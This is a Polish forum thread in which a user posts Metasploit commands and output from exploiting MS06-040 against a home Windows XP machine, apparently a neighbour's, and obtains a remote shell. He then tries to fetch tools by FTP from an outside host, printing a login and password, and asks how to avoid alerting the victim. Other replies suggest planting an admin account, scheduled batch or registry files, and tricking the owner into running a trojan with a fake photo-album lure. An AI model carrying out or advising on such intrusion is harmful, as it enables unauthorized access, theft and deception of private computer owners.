metasploit, download problem ;[

[scorn]

wszystko działa, wszystko cacy, natomiast po wejsciu do w sumie gołego systemu problem jest następujący, nie ma nic, co umożliwiłoby łatwe proste i przyjemne ściągnięcie nań potrzebnych narzędzi.

Kod:

msf netapi_ms06_040(win32_bind) > set RHOST 10.0.10.170
RHOST -> 10.0.10.170
msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] This system may be patched or running Windows XP SP1 or SP2[*] RPC server responded with:[*] RESPONSE => response[*] STUB DATA = \x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7D\x00\x00\x00\x4B\x08\x00\x00[*] Exiting Bind Handler.
msf netapi_ms06_040(win32_bind) > unset RHOST
msf netapi_ms06_040(win32_bind) > set RHOST 10.0.8.63
RHOST -> 10.0.8.63
msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] Got connection from 10.0.9.4:54810 <-> 10.0.8.63:4444

Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

no i jesteśmy... ale dalej...
spróbujmy sciągnąc coś z ftp...

Kod:

Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ftp
ftp
open agregator.w.interia.pl
Uytkownik (agregator.w.interia.pl:(none)): agregator
m3f1st0f3l3s
dir

quit
chujwiecojeszcze ;-)

wynik jest taki sam - brak odpowiedzi od terminala, co mnie bardzo martwi... ;-)

dopiero po ctrl+c terminal reaguje:

Kod:

Caught interrupt, exit connection? [y/n] Dropping back to the console...

Caught interrupt, exit connection? [y/n] y[*] Exiting Bind Handler.
msf netapi_ms06_040(win32_bind) >

i tu leży właśnie istota problemu: jak ściągnąc coś ze zdalnego komputera, używając konsoli wygenerowanej przez metasploit'y?

[Dominik]

Nie znam się na tym, ale może ten komp albo router przez który się komunikuje ze światem ma we firewall'u zablokowane porty ftp :]

Próbowałeś może przez telnet?

[scorn]

1. próbowałem, nie ma tam firewalla (gdyby był, to nie wiem, czy bym się przebił tak łatwo ;-) ), i jest to zwykły box domowy, nie router.
2. telnetem próbowałem, nie chodzi tutaj o to. kwestią jest to, że "środowisko" metasploita nie uruchamia (raczej nie wyświetla) "poprawnie" programów typu edit, ftp, telnet, także nie w tym sęk, o czym mówisz, ale wszelkie uwagi, koncepcje, mile widziane.
3. jest kilka innych możliwości przejećia w pełni maszyny w takim przypadku, jak opisuje, tj. przez użycie odpowiednio zbudowanych komend echo:
echo "komenda" >> do.pliku.txt
i później użycie tego, jako wsadowych parametrów dla aplikacji.
np. ftp.exe -slik.txt
ale ten sposób też nie działa...
inne sposoby to zbudowanie pliku.reg, ale nie wiem, czy aby nie będzie wymagane kliknięcie "Dodaj" od użytkownika siedzącego przy monitorze (co demaskuje nas na starcie ;-) (chociaż generalnie jest możliwość z konsoli wydania polecenia z parametrem /y jako potwierdzenia... :S nie wiem...
dalszy sposób, to budowa pliku.bat ale też brak mi tu weny twórczej... także raz jeszcze: podpowiedzi, sugestje, pomysły jak najbardziej mile widziane ;-)

[Dominik]

Po IP domyślam się że jesteście w tej samej sieci osiedlowej, no chyba że podałeś nam inne.

A możesz zrobić coś takiego żeby przesłać jakiś plik *.bat, *.reg czy cokolwiek co odblokuje telnet a następnie będziesz mógł się zalogować przez niego na konto gościa, albo jakieś inne.

Powiedzmy że jesteś w stanie przesłać tam dowolny plik, niech więc uruchomi się automatycznie o danej porze i wykona to co napisałem wyrzej, albo jeszcze inaczej, ta osoba najprawdopodbniej korzysta z konta administratora, więc mógłbyś założyć tam swoje własne konto.

[blackicenavarro]

zalezy co chcesz zrobic z tamtym kompem. jezeli chcesz cos wyssac sa inne narzedzia ktore to zrobia. wg mnie nie liczy sie sposob ale wynik.

[scorn]

przykłady panowie... konkretne przykłady...? ;-)

[blackicenavarro]

hmm, dalej nie napisales co chcesz zrobic z tamta maszyna. przyjmuje ze chcesz cos wyssac. zatem analizujac to co pisales koles jest amatorem-posiada zatem najweikszego backdoora w historii polskiego internetu a mianowice slawetne dziurawe GG. Mysle ze to jets klucz do rozwiazania calego problemu. jest multum trojanow wykorzystujacych jego dziury. banał. oczywiscie wymaga rekacji ofiary-no ale skoro nawet nie ma firewalla co za problem wyslac mu cos :P - troche socjotechniki i problem rozwiazany np. czesc nazywam sie monika, wysle ci album moich zdjec

[scorn]

nie przejdzie. potrzebuje coś innego ;[
a wiecie jak można stworzyć pli, który otworzy z konsoli serwer telnet/udostępni jakiś katalog? tyle, że z konsoli mi chodzi jak to zrobić (w win naturalnie ;-) )

[Dominik]

Ty a właśnie, co z katalogami udostępnionymi? Przeważnie jakiś katalog jest udostępniony, czasami nawet nie jest zabezpieczony hasłem, sprawdź w końcu jesteście w tej samej sieci.

[scorn]

litości... ;>
zgadnij, czy sprawdziłem przed sprawdzaniem metasploitem, inne możliwości, które przyszły mi do głowy ;-)

powiedz lepiej, jak udostępnić katalog używając konsoli ;>